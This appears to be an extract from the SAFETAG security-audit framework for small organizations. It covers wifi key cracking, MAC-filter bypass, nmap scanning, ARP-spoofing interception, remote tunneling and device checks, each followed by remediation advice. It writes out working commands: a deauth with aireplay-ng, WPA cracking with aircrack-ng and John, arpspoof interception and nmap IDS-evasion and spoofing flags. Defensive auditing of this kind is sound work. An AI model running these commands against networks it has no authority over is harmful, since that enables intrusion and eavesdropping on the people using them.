WEP (Wired Equivalent Privacy) has been found with several vulnerabilities. The RC4 algorithm that it uses to generate the keystream for encryption is subject to two separate weaknesses.

On the other hand, WPA/WPA2 (Wi-Fi Protected Access) is also found to be vulnerable to attack known as KRACK(Key Reinstallation Attacks) as well as offline (high speed) attacks against the password itself. WPS, a common "feature" that is on by default on WPA networks, has significant vulnerabilities.

WPA3, a new standard, is built to disallow offline password attacks, making it significantly harder to break in to that WPA2 networks. As it becomes available and devices support it, it should be a priority upgrade if wifi network security is a concern.


WEP Cracking

The auditor can be guaranteed to access a WEP network with sufficient time by cracking the WEP key.

References

For educational purposes, if no WEP network is available, you can use this pre-built airodump-ng capture file and skip the airodump-ng and aireplay-ng packet injection steps.


MAC Filtering Bypass

Open and MAC-address-filtered wireless access points are not only open to anyone within range to join and listen in to, but also do not provide protection to those on the network itself, even if they do not "broadcast" their name. These may seem like great ways to prevent unauthorized users from accessing your network without resorting to passwords, but they are trivial to overcome.

Auditing MAC address filtered access point

The auditor can easily gain access to an open or MAC address filtered access point.

airodump-ng
* Change our MAC address to one that’s on the whitelist
ifconfig mon0 down
macchanger -m [MAC ADDRESS IDENTIFIED] mon0
ifconfig mon0 up

References


WPA Cracking

The organization’s wireless Local Area Network (WLAN) protects the network and its users with WPA encryption. This is an important security measure, and a WPA-protected wireless network is much safer than an unencrypted “open” network or a WEP-protected network. (WEP is fundamentally flawed, and extremely simple attacks have been widely known for over a decade.) However, the ease with an attacker could guess the WPA key, or “WiFi password,” is a serious issue, particularly considering its importance as an essential perimeter control. An attacker who gains access to the wireless LAN immediately bypasses many protections that network administrators, and other users of the office network, often take for granted. Put another way, anyone able to guess the WPA key is immediately “inside the firewall.”

Using a laptop and a wireless card with a standard, internal antenna (or using a customized smartphone or other small device), an attacker could easily position themselves close enough to the office to carry out the first phase of this attack, which would only take a few minutes. The second phase, which is supposed to be the difficult part, could take even less time. From the privacy of their own home or office, the attacker could use a minimally customized password dictionary to guess the WPA key .

Materials Needed

Instructions

An attacker can crack the office’s WPA key in approximately with a short and minimally customized password dictionary based on open information about the organization and basic word collections.

Step 1: The attacker customizes their WiFi password dictionary, adding phrases related to the subject: organization name, street address, phone number, email domain, wireless network name, etc. Common password fragments are included, as well: qwerty, 12345, asdf and all four-digit dates back to the year 2001, for example, among others. The attacker may then add hundreds or thousands of words (in English and/or other relevant languages).

See the Password Strength exercise for details on password dictionary buidling and usage.

Step 2: The attacker would then begin recording all (encrypted) wireless traffic associated with the organization’s access point:

$ sudo airodump-ng -c 1 --bssid 1A:2B:3C:4D:5E:6F -w sampleorg_airodump mon0

 CH  1 ][ Elapsed: 12 mins ][ 2012-01-23 12:34 ][ fixed channel mon0: -1
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 1A:2B:3C:4D:5E:6F  -70 100    12345    43210    6   1  12e. WPA2 CCMP   PSK sampleorg
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 1A:2B:3C:4D:5E:6F  01:23:45:67:89:01    0    0e- 0e   186    12345
 1A:2B:3C:4D:5E:6F  AB:CD:EF:AB:CD:EF    0    1e- 1      0     1234
 1A:2B:3C:4D:5E:6F  AA:BB:CC:DD:EE:FF  -76    0e- 1      0     1122
 1A:2B:3C:4D:5E:6F  A1:B2:C3:D4:E5:F6  -80    0e- 1      0     4321

wifite is also useful for this step, and claims to automatically de-auth (step 3).

Step 3: Next, the auditor forces a wireless client, possibly chosen at random, to disconnect and reconnect (an operation that is nearly always invisible to the user).

In the example below, AB:CD:EF:AB:CD:EF is the MAC address of a laptop that was briefly disconnected in this way.

$ aireplay-ng -0 1 -a 1A:2B:3C:4D:5E:6F -c AB:CD:EF:AB:CD:EF mon0

 15:54:48  Waiting for beacon frame (BSSID: 1A:2B:3C:4D:5E:6F) on channel -1
 15:54:49  Sending 64 directed DeAuth. STMAC: [AB:CD:EF:AB:CD:EF] [ 5| 3 ACKs]

The goal of this step is to capture the cryptographic handshake that occurs when the targeted client reconnects. Try using different clients if the first one doesn't work, or try (physically) moving around.

This handshake does not contain the WPA key itself, but once the the complete handshake process has been seen, the auditor (or a potential attacker) can leave the vicinity and run various password cracking tools to try and discover the password. While a complete password cracking tutorial is out of scope for SAFETAG documentation, below are three strategies:

Step 4: The auditor attempts to discover the WPA password.

A good wordlist with a few tweaks tends to break an unforunate number of passwords. Using a collection of all english words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords.

    $ aircrack-ng -w pwdpairs.txt -b 1A:2B:3C:4D:5E:6F sampleorg_airodump*.cap

For WPA captures, John can either feed in to an aircrack process or attack a capture directly. For captures, you first have to convert the .cap file (from wireshark, wifite, airodump, etc.) to a format that John likes. The Jumbo version we use has conversion tools for this available:

  $wpapcap2john wpa.cap > crackme
  $./john -w:password.lst -fo=wpapsk-cuda crackme

Results

Successful password cracking via piping these into aircrack-ng:

 Opening sampleorg_airodump-01.cap
 Reading packets, please wait...
                                 Aircrack-ng 1.1
                    [00:00:05] 9123 keys tested (1876.54 k/s)
                           KEY FOUND! [ sample2012 ]

      Master Key     : 2A 7C B1 92 C4 61 A9 F6 7F 98 6B C1 AB 53 7A 0F
                       3C AF D7 9A 0C BD F0 4B A2 44 EE 5B 13 94 12 12

      Transient Key  : A9 C8 AD 47 F9 71 2A C6 55 F8 F0 73 FB 9A E6 1D
                       23 D9 31 25 5D B1 CF EA 99 2C B3 D7 E5 7F 91 2D
                       56 25 D5 9A 1F AD C5 02 E3 2C C9 ED 74 55 BA 94
                       D6 F5 0A D1 3B FB 39 40 19 C9 BA 65 2E 49 3D 14

      EAPOL HMAC     : F1 DF 09 C4 5A 96 0B AD 83 DD F9 07 4E FA 19 74

The fourth line of the above output provides some useful information about the effectiveness of a strong WPA key. That rate of approximately 2000 keys per second means that a full-on, brute-force attack against a similar-length key that was truly random (and therefore immune to dictionary-based attacks) would take about 70^9 or 20 trillion seconds, which is well over 600,000 years. Or, for those who favor length and simplicity over brevity and complexity, a key containing four words chosen from among the 10,000 most common English dictionary words would still take approximately 150,000 years to crack (using this method on an average laptop).

It is worth noting that an attacker with the resources and the expertise could increase this rate by a factor of a hundred. Using a computer with powerful graphical processing units (GPUs) or a cloud computing service like Amazon’s EC2, it is possible to test 250,000 or more keys per second. A setup like this would still take several lifetimes to guess a strong password, however.

Regardless, the success of this attack against a wireless network would allow an attacker to bypass all perimeter controls, including the network firewall. Without access to the office LAN, a non-ISP, non-government attacker would have to position themselves on the same network as an external staff member in order to exploit any flaws in the organization’s email or file-sharing services. With access to the local network, however, that attacker could begin carrying out local attacks quite quickly, and from a distance.

See the Wireless Range Mapping activity for guidance on mapping the reach of the wifi network.

References


WPS PIN Cracking

WPS was built as an addition to WPA to make it easier to add devices without typing in secure passwords, but this ease of use means that a malicious actor can pose as a device and effectively reduce the potentially very difficult passwords WPA allows down to a simple numeric-only 8 character PIN. Further, the WPS system allows an attacker to work on this PIN in two parallel chunks, further reducing its security. This, like WEP, is a "live" attack - you have to stay connected to the network - but also like WEP, it is a guaranteed attack; your brute forcing of the WPS system will eventually (2-10 hours) allow you network access.

Instructions

References

Recommendation
Recommendations for non-WPA networks

Transitioning to WPA networks with strong passwords, even for guest networks, is recommended.

MAC filtering and WEP provide no effective protection for a wifi network. Most wifi routers offer WPA encryption as an option, and if this is available it should be immediately implemented. Some older routers (and wifi devices) do not support WPA. It is highly recommended to upgrade immediately to hardware that supports WPA and to eliminate all WEP network access. Very few devices still functional do not support WPA2. As WPA3 becomes an option, upgrade to that.

Recommendations for WPA networks

WPS Pin entry should be disabled on the wireless router, or only enabled temporarily to add new devices to the network.

Choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

The WPA password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains four or five—or more—relatively uncommon words.) The password should not contain common words, including number sequences, especially if they are related to the organization, its employees or its work.

A guest network, with no local network access and a distinct (possibly easier to communicate) password should be available if guests are ever given wifi access. Because passwords for guest networks inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the guest password should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

Network Scanning

Summary

Network scanning is a technique used to gather information about devices connected on a certain network. It involves enumerating open ports and services running to determine the type of device, the operating system it is running, the applications that is it running and a lot more. There are a lot of open source tools that you can used to perform this technique. Though it may look like simple and ordinary technique, it may be used for both good and bad intentions.

The goal for this exercise is to identify, enumerate and categorize all devices connected to the network. Any device that has an IP address is our target. This may include:

Overview
Materials Needed
Considerations
Walkthrough

Local networks often have a variety of devices connected to them - servers, laptops, printers, and user devices such as cellphones and tablets. Scanning the connected devices can reveal potential areas for further research such as odd ports being open, out of date devices/services, forgotten servers/services etc. These information are then reviewed in vulnerability research exercise, and then (if required) validated in the penetration testing exercise.

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as "safe".

Overall Process
  1. Using zenmap/nmap, identify all of the devices currently active on the network. It is worth repeating a quick scan at different times of the day and on different days to get a more complete view of the network.
    • Discover network-connected devices, including servers and workstations, but also smartphones, printers, security cameras, voip phones, and other devices.
    • Record the version and patch levels of software on the device. 45
  2. For the active, in-scope devices, the next step is to gather additional details including hostnames, mac addresses (useful for tracking devices over multiple days, as their IP address may change), operating system and versions, port numbers, and any running services such as shared drives, remote management services and old or legacy services. Doing host enumeration sometimes takes time, as not all devices may respond to your scans in the same way. To overcome this, there are variant tools with the steps on how to perform an efficient network scan.
    • Run OS detection options
    • Scan for open ports and service banners (not all ports correctly map to their "expected" services, also provides service version information)
    • select additional nmap scripts and more exhaustive port scanning as needed. Filter for safe scripts!
  3. Categorize the devices that you will discover. This is to make it more efficient later when runing vulnerability scans, enabling you to target them effectively. For devices which are not easily categorized, see the IoT section below

  4. Port/Service research, and How to decide if an open port is suspicious If a port is open in a personal computer or mobile device, this should be immediately considered suspicious and investigated.
    • Inspect all systems providing internal services to the host organization.
    • Identify weak ports or services available under the current device's firewall configuration. 46
    • Identify and investigate any open ports that should not be open (e.g.: almost no ports should be open in personal computers, see below)
    • Identify all odd/obscure/one-off services. 47
  5. Using the list of software versions and patches identify attacks and, if possible, identified malware that devices in the office are vulnerable to.

Custom instructions per type of device

Servers

An open port in a server or IoT device should be investigated if it doesn't correspond to a known service. For example, if the open port is 80, 8080, or 443, it's supposed to be open for a web server, so you can try to browse it by pasting the IP address in your browser address bar.

If it's for SSH (port 22), try to log into it through SSH. If the service isn't supposed to be running in the identified device, you can run a scan of the open ports and request service banners, and/or try to telnet directly to the IP:port to identify what service they are connected to. To identify what a port might be used for, look at the complete list at IANA.org. Using nmap's banner scripts will also reveal what the service reports itself as (for example, you can run ssh, usually port 22, on port 443, usually https). Once you have identified what service that port might be used for, always check that that service is actually running in the machine and that the user or sysadmin is aware of it.

In general, these are ports that might be open in a server:

Port Service
21 FTP
22 SSH
23 Telnet
25 SMTP
53 DNS
80 HTTP
110 POP
139 SMB
143 IMAP
194 IRC
443 HTTPS
465 SMTP
530 CUPS
587 SMTP
667 IRC
993 IMAP
995 POP
1900 port authority
3306 MySQL
6881 to 6889 Torrent
6969 Torrent
8080 HTTP

IoT Devices

IoT (Internet of Things) is getting popular in use because of it's ease of use and ability to address certain needs. (e.g. use of IP camera instead of CCTV). As classes of network appliances become common, additional exercises (such as the VOIP assessment) can be created. For others, it is still worth conducting a basic assessment to determine what security implications network-connected devices may have.

In the course of network scanning, watch for devices without clear operating system identification (from nmap/zenmap), and/or devices registering as Linux or unknown (particularly if there are not Linux users or servers), and use hostnames and MAC address lookups Wireshark, MACVendors for "hints".

Follow up on these devices with more intensive, specific scans to positively identify them, and/or follow up with staff to help physically locate the devices. Some devices, such as Smart TVs, may not even be normally thought of as devices worth considering, but if they are connected to the work network, they can add vulnerabilities.

Once any IoT devices have been identified, follow up with research as to their current and possible patch level/software update, what vulnerabilities they may have even if fully updated, and if there have been any known attacks against the platform. Check their configuration to see if they are accessible from the Internet (directly, via UPnP, or via an external service that the device connects out to). Check to see that default passwords have been updated, and any service-connected devices have strong, unique and not-previously-breached passwords.

If there are un-mitigateable vulnerabilities, consider suggesting removing the IoT device from the network or creating a separate network disconnected from organizational resources for non-work devices.

Windows / SMB Networks

You can use smbtree to request a list of all smb network device names and nmblookup to connect them to their IP address.

Unsigned NTLM authentication messages vulnerable to Man-in-the-Middle attack on SMB file servers. It also allow an attacker on the LAN to add, remove or copy files to and from the organization’s file servers (and workstations with filesharing enabled).

MacOS

GNULinux

External Network Scanning

Selected scanning of external network devices (websites, webmail, extranet services) may also reveal vulnerabilities or other areas of concern. However, it is important that you seek approval or any written document that proves you have the authority to scan your target organization along with its web resources and services.

External network scans are different for local network scans. This is because you are scanning devices that are publicly available, and can be done remotely outside the organization's premise. If your auditee agreed to have their public facing machines scanned, keep in mind that you need to consider asking your auditee for whitelisting options for shunning IDS/IPS, firewalls and other blocking mechanisms during your scan. Also make sure that you have verified the target in-scope. This is to avoid scanning out-of-scope targets that may lead you to other problems.

Most of the machines you'll encounter over external network scans were:

Using nmap/zenmap

Using a network scanning tool (nmap/zenmap work well), discover the devices connected to the organization's network, and explore further information such as services, service banners, and operating systems. More intense scans can be too time-consuming to run across the entire network, so target those to higher value systems. As always, be aware of the scans and additional scripts you choose, and focus your exploration (in nmap) on scripts categorized as safe or "non-disruptive".

According to it's nmap's website:

"Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts". It's considered as the most popular network mapping tool available.

Below are commands to perform network scanning using Nmap.

Command Description
nmap 192.168.1.1 Scan a single specific IP/target
nmap www.targetdomain.com Scan a specific domain
nmap 172.16.1.1-35 Scan the IP range from 192.168.1.1 to 192.168.1.35
nmap 172.16.1.1/24 Scan a network subnet
nmap -iL target-IPs.txt Scan a list of IP from the list file target-ip.txt
nmap -p 80 172.16.1.1 Scan specific port/s on a target or IP range or a list file
nmap -p 21-80 172.16.1.1 Scan target, IP range or list file with a specific port range
nmap -F 172.16.1.1 Scan target with 100 most common ports (FAST)
nmap -p- 172.16.1.1 Scan all 65,535 ports on a target
Option Command Description
-sT nmap -sT 172.16.1.1 TCP connect port scan (with root privilege by default)
-sS nmap -sS 172.16.1.1 Scan using TCP SYN port Scan
-sU nmap -sU 172.16.1.1 Scan UDP ports
-sA nmap -sA 172.16.1.1 Scan using TCP ACK port scan
-sn nmap -sn 172.16.1.1/24 Host discovery scan IP subnet range - port scanning disabled
-Pn nmap -Pn 172.16.1.1/24 Port scan IP subnet range - host discovery disabled
-n nmap -n 172.16.1.1 Scan target without DNS resolution
-PR nmap -PR 172.16.1.1 Perform ARP discovery on local network
Option Command Description
-sV nmap -sV 172.16.1.1 Perform version detection of services running on ports
-O nmap -O 172.16.1.1 Remote OS detection using the TCP/IP stack fingerprinting method
-A nmap -A 172.16.1.1 Enable OS detection, version detection and traceroute
Option Command Description
-T0 nmap -T0 172.16.1.1 PARANOID scan - Evade IDS
-T1 nmap -T1 172.16.1.1 SNEAKY scan - Evade IDS
-T2 nmap -T2 172.16.1.1 POLITE scan - Slow scan for less bandwidth and use less target machine resources
-T3 nmap -T3 172.16.1.1 NORMAL scan - Default speed
-T4 nmap -T4 172.16.1.1 AGGRESSIVE scan - speed scan assuming your on a fast and reliable network
-T5 nmap -T5 172.16.1.1 INSANE scan - Extraordinary fast network and trades off with accuracy
Option Command Description
-sV -sC nmap -sV -sC 172.16.1.1 Scan using default safe scripts
-sV --script=scriptname* -sV --script=smb* 172.16.1.1 Scan target with a set of script (for this example, smb scripts
--script=script-name.nse nmap -sV -p 443 --script=ssl-heartbleed.nse 172.16.1.1 Scan using a specific script (for this example, we used the ssl-heartbleed.nse script
--script=script1,script2,script3 nmap --script=asn-query,whois,ip-geolocation-maxmind 172.16.1.1 Scan using a multiple different scripts combined
Option Command Description
-f nmap -f 172.16.1.1 Scan using small fragmented IP packets for evading packet filtering
-mtu value nmap -mtu 64 172.16.1.1 Scan using custom MTU size
-D IP address to spoof nmap -D 172.16.1.200, 172.16.100 172.16.1.1 Scan using set spoofed IP addresses
-S fakesource.com nmap -S fakesource.com targetdomain.com Scan from fakesource.com. (May require egress interface (e.g. eth0) and -Pn option)
-g port number nmap -g 53 172.16.1.1 Scan using port 53 as source port number (making it look like a regular DNS traffic)
-proxies http://1.2.3.4:8080,http://4.3.2.1:8080 nmap **-proxies http://123.12.23.10:8080,
http://211.212.101.22:8080** 172.16.1.1 Relay nmap scans through HTTP/SOCKS4 proxies
Option Command Description
-oN name.file nmap 172.16.1.1 -oN result.file Generate normal output to file result.file
-oX file.xml nmap 172.16.1.1 -oX result.xml XML output to file result.xml
-oG name.file nmap 172.16.1.1 -oG result.grep Generate grep-pable output to file result.grep
-oA results nmap 172.16.1.1 -oA results Generate output to 3 different major formal

Working with GUI using Zenmap

While Nmap may seem to be intimidating to some specially with all those commands and options, you can use a GUI-based Nmap called Zenmap. You can download Zenmap from this link

Zenmap has different features that helps you manage scans to importing and exporting of results.

It comes with a pre-set scan settings that you can choose. Depending on your target environment and your agreement with the client, you can select from:

Option Command
Intense Scan nmap -T4 -A -v
Intense Scan + UDP nmap -sS -sU -T4 -A -v
Intense Scan + all TCP ports nmap -p 1-65535 -T4 -A -v
Intense Scan - No ping nmap -T4 -A -v -Pn
Ping Scan nmap -sn
Quick Scan nmap -T4 -F
Quick Scan Plus nmap -sV -T4 -O -F --version-light
Quick Traceroute nmap -sn --traceroute
Regular Scan nmap
Slow Comprehensive Scan nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)"
Recommendation

While office networks are often treated as "trusted" spaces, measures should be in place to reduce the potential harm of an attacker who gains access. In addition, devices that "travel" -- such as laptops and mobile phones -- should have adequate security settings (generally, firewalls) to protect them on other networks.

A policy should be in place for connecting personal devices to work networks, as well as work devices to non-work networks.

Network Traffic Analysis

Summary

Any content that is sent out over the network without encryption is easy to intercept; this includes email, web passwords, and chat messages.

This attacker could be someone, such as a patron of the Internet cafe where a staff member is working, who just happens to be using the same local network to connect to the Internet. Or, she could work for an organization with privileged access to the relevant network, such as the Internet Service Provider (ISP) of either the sender or receiver and other network-backbone connections made along the way.

Overview
Materials Needed
Considerations
Walkthrough
Network Traffic Interception

Step 1: The attacker tricks the victim into routing all of their traffic through the attacker’s machine. This involves making a simple request to the victim’s IP address, which is not difficult to do. Computers are rarely configured to ignore such requests.

$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

$ sudo arpspoof -i wlan0 -t 192.168.1.99 192.168.1.1

Sample Output:

00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55
...
00:11:22:33:44:55 aa:bb:cc:dd:ee:ff 0806 42: arp reply 192.168.1.1 is-at 00:11:22:33:44:55

In the example above, only a single victim (192.168.1.99) is being targeted, but the attack works fine against multiple victims, or even against the entire network. In other words, the attacker does not need to know which IP address (on the office or Internet cafe LAN, for example) belongs to the target. Furthermore, the victim is extremely unlikely to notice any sign that this phase of the attack is taking place.

EtterCap provides a powerful frontend to managing this process with multiple potential targets. In EtterCap:

Step 2: At this point, if the attacker is looking for unencrypted traffic, all the attacker needs to do is launch a packet-sniffer, such as Wireshark, and scan through the intercepted traffic for specific vulnerable information, such as email or website logins, as well as traffic revealing shadow infrastructure usage, such as Dropbox.

Wireshark can also be used to identify malicious traffic.

If you rarely use Wireshark, the output you will see will be a long list of packets, protocols and connections that might be hard to classify. To look into suspicious processes in a clearer way, you can use the "Protocol Hierarchy" option in the Statistics menu A good video to learn how to use this option for this purpose can be found here.

Recommendation

Only use services with "SSL" encryption ("HTTPS"), and consider adding HTTPS Everywhere to browsers. This does not itself guarantee protection from all attacks, but it is a good first-step in protecting information (such as passwords or email) in transit from your computer to the service provider.

Remote Network and User Device Assessment

Summary

This component allows the auditor to work remotely to identify the devices on a host's network, the services that are being used by those devices, and any protections in place, as well as to assess the security of the individual devices on the network.

Overview

There can be several approaches for this exercise, depending on the scenario.

Scenario 0

The organization has contacted the auditor through an intermediary who is familiar with tech and can follow SAFETAG instructions, or the organization has a tech person among their employees.

This scenario is comparable to a situation where the auditor is on site. In this case, the auditor will instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

The organization has someone among their employees who is ready to follow simple instructions, including opening a terminal and pasting commands we will provide them.

In this scenario, the auditor will send simple instructions to the auditee, so as to be able to access the organization's network through a reverse SSH tunnel and assess the LAN and single devices from there. To run the computer used within the organization's network to establish the tunnel, a UNIX system is needed. This will be a Linux live distribution or a Mac computer.

Scenario 2

In this scenario, no one at the organization is ready to apply complex instructions. Instead of relying on an individual, the auditor will rely on tunneling into a device located in the physical space of the auditee. This can be done in two ways:

  1. Remote Desktop or remote VPN into targeted Network. Remote Desktop is tunneling into a targeted machine that lives on the same targeted LAN network where you wish to scan the network and do the device assessment; the auditor controls the machine remotely and uses it as the auditor machine.
  2. VPN to a trusted VPN server. In this case, the auditee will connect one of their machines to a trusted VPN server, and the auditor will connect to the same VPN server, allowing both LANs at the auditee's and auditor's ends to connect.
Materials Needed
Scenario 1
Scenario 2

In the case of remote desktop:

In the case of using an in-the-middle trusted VPN server:

Applications to use: TightVNC TeamViewer Windows remote desktop

Considerations
Scenario 1
Walkthrough
Scenario 0

Instruct the intermediary or the tech person in the organization to follow the instructions in the exercise on Network mapping and on User device assessment.

Scenario 1

Legend

Instruct the auditee to initiate a connection to the server (S) and set up a reverse ssh server:

Let's assume we have a server named safetag-audit.org (S), and usernames for each auditee called auditee1, auditee2, etc.

Important: make sure that the ports you use don't conflict with ports by other services or auditees, i.e. don't use a port number twice.

Once this session is open, the auditor can access the auditee's machine (C). At this point there are a few powerful options:

example:

to connect to site 0:

    ssh [email protected] -p 2200

with site 1 in the previous example, the port would be 2210 (or whatever the auditee used in her command).

An additional thing that one might want to do is making the connection from C to S passwordless and automatic (this can be accomplished with tools or scripts readily available on the internet).

WARNING: Make sure to remove/clean any persistent connections once you are done with auditing.

There should be no need for multiple reverse tunnels, as multiple forward tunnels can be set up from S to C if needed (eg. VNC or RDP); this requires multiple forward tunnels from A to S though.

Scenario 2

Legend:

Someone at the auditee's side will prepare machine A in coordination with the auditor, then install TeamViewer.

After that, and using a trusted communication method, TeamViewer ID and passcode will be sent to the Auditor.

The auditor will use the ID and passcode to connect to the machine and start using machine A as the auditing machine.

There are pros and cons for this:

Cons:

  1. Internet speed: You will need a high speed Internet connection to achieve such task, as the remote access will be transferring the desktop of the targeted machine to you in order to do the tasks.
  2. Connection interruption: While you are working remotely, you might face some connection interruptions during your session, and restarting the remote access will be a challenge because in most of the cases you will need someone at the other end to authorize you to tunnel into the machine.
  3. Physical limitations: You are still physically far from the machine, which means you cannot connect a USB drive to boot from it or do any other tasks that require you to be near the device.
  4. Installing Kali Linux might be hard: It might be hard for a non-technical person to prepare a Kali Linux machine

Pros:

  1. Usability: TeamViewer is easy to install and use. Anyone with basic knowledge on how to install software can assist you with preparing the auditing machine.
  2. Network speed: Technically, your auditing machine is the machine you are connected to, which is physically located in the targeted office and connected to the LAN network. This means that you will have full speed running your audit tasks.

Note: Some remote assistant software provides VPN solutions that turn Machine A into a VPN Server and allow Machine B to VPN into it. Tunneling into that VPN server will allow you to connect to the local LAN network, which will allow you to use Machine B to run the audit.

Using an in-the-middle trusted VPN server

Legend:

Auditee's Network --------- (A) ---------- C ---------- (B) ---------- Auditor's Network

The auditor will put efforts preparing an OpenVPN server (C) and create 2 profiles (Keys and configurations) to allow machines A and B to connect to C.

Get a VPS from your favorite and trusted VPS provider and keep in mind the physical location of the server, then install OpenVPN Server by following the instructions contained in this guide on Ubuntu Server.

The default configuration of OpenVPN will not allow the clients (A-B) to see each other on the network. To allow that, you have to enable client-to-client directive and enable your both subnets (Auditee and Auditor) to see each others networks. To do so, follow these instruction.

After finishing the installation and testing it, the auditor will pass the .ovpn file to the person at the auditee's site through a trusted way, and provide instructions on how to install and connect to the server. After connecting A and B to C, the auditor will be able to start the network and device assessment at the other end.

Note: In case the VPN is censored in A or B's countries, or in both, you can follow these instructions on how to bypass the censorship by using pluggable transports.

Recommendation

Router Assessment

Covered in full in Vulnerability Scanning and Analysis

Authors: - SAFETAG Info_provided: - unknown Info_required: - unknown ---

Organizational Device Usage

Summary

This component allows the auditor to discover and assess the security of the devices on the network and/or used in the organization. This component consists of interviews, surveys, network mapping, and inspection of devices.

Purpose

Compromised devices have the ability to undermine nearly any other organizational attempt at securing information. Knowing if devices receive basic software and security updates/upgrades and what core protections exist against unauthorized access is vital to designing a strategy to make the host more secure. Because the SAFETAG framework is focused on the security of data, it's also crucial that the physicality of devices on which this data resides, including the hard-wired networks through which it's exchanged, be not overlooked.

The Flow Of Information

User Device Assessment Information Flow
User Device Assessment Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Password Security

Privilege Separation Across OS

Examining Firewalls Across OS

Identifying Software Versions

Device Encryption By OS

Anti-Virus Updates

Identifying Odd/One-Off Services

Activities

Device and Behaviour Assessment

Summary

The auditor checks staff devices for updated systems and software, anti-virus and other security capabilities, and identifies software running on computers and its current version. The auditor checks for known vulnerabilities to any out of date software.

This is used to develop a report component exposing how un-updated software can lead to large vulnerabilities.

Overview
Materials Needed
Considerations
Walkthrough

The auditor inspects a subset of key and/or representative user devices (work & personal). The auditor should focus on the work devices to limit scope creep, but if the office has many personal devices accessing organizational accounts/data, the auditor should share what "red flags" they are looking for and work in tandem with device owners and/or IT staff. For a small office, it may be possible to check every machine. For larger offices, the auditor should use a subset to get a feel for the overall security stance of user devices.

As you work with staff members, also interview them about the other devices they use such as phones and tablets, and how they connect to work services - email/webmail, chat Apps, intra/extranet tools, Constituent Relationship Management (CRM) tools like CiviCRM or Salesforce, financial tracking tools, and website management tools.

Below is a checklist to assist in checking across different platforms/versions for common security needs.

OSX
Windows

If Windows is not your primary OS, you can download sample Virtual Machines (with time limitations) from Microsoft through their project to improve IE support via https://www.modern.ie/en-us/virtualization-tools#downloads (see also http://www.makeuseof.com/tag/download-windows-xp-for-free-and-legally-straight-from-microsoft-si/ and https://modernievirt.blob.core.windows.net/vhd/virtualmachine_instructions_2014-01-21.pdf)

Windows 10

Windows 8

Installed updates

Control Panel Programs and features installed updates CLI: http://www.techsupportalert.com/en/quick-and-easy-way-list-all-windows-updates-installed-your-system.htm

Windows 7

In Windows 7, (GUI) Control Panel -- All Control Panel Items -- Action Center (Security tab) provides a quick run-down of most security features installed and their update status. It does not show drive encryption or specific versions.

Windows XP

If user is still operating on windows XP, recommendation is to upgrade to later windows. Windows XP is no longer supported and is not receiving security updates: https://www.microsoft.com/windows/en-us/xp/end-of-xp-support.aspx

If there is an organizationally critical system relying on Windows XP, removing it from the network and carefully managing data exchange with it may provide a bridge solution until a replacement process can be funded and rolled out.

Linux
Recommendation

If Unsupported Operating System - Upgrade to Recent Version

Popular operating systems like Windows XP are, sadly, no longer receiving security updates. Upgrade to the latest version keeping in mind the system requirements of the version selected. For Windows, review the Windows lifecycle fact sheet for upcoming "EOLs" (End of Life). Apple does not publish EOL schedules, but historically releases security updates for their current and two prior releases.

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Pirated Software - Move to Licensed Software Systems

While "pirated" operating systems and software are extremely common (especially for Windows) they often leave much to be desired in terms of security. If the OS or Software is not receiving regular updates from the software creator, it is extremely vulnerable to thousands of potential attacks. Switch to licensed software or recommended Free Open Source Software

If Outdated - Update Operating Systems and Other Software

Operating Systems and Softwares of all varieties - Windows, Mac, Linux, and others, are constantly being updated. These updates often fix bugs, but they also protect the system from newly discovered vulnerabilities. It can seem difficult to keep updating constantly, but this is very important to protect even non-sensitive systems.

If Vulnerable Software - Update Vulnerable Software

Many critical software components, such as Java or Adobe Flash, have many vulnerabilities and need to be aggressively updated. If there are not needed for work by the users, uninstall them

If No Anti-Virus and Anti-Malware Scanner - Install Anti-Virus and Anti-Maware Scanner

An Anti-virus and Anti-malware offer some minimal protection to the system and therefore is important to have them installed.

If Outdated Anti-Virus - Update Anti-Virus

Most AV tools automatically update, but this can sometimes get out of sync, or if the AV was a pre-installed trial system, it will stop updating after its trial period. An out of date anti-virus is worthless. Therefore ensure that continuous udpdating of AV is done.

If Unencrypted Drive - Encrypt Hard Drives

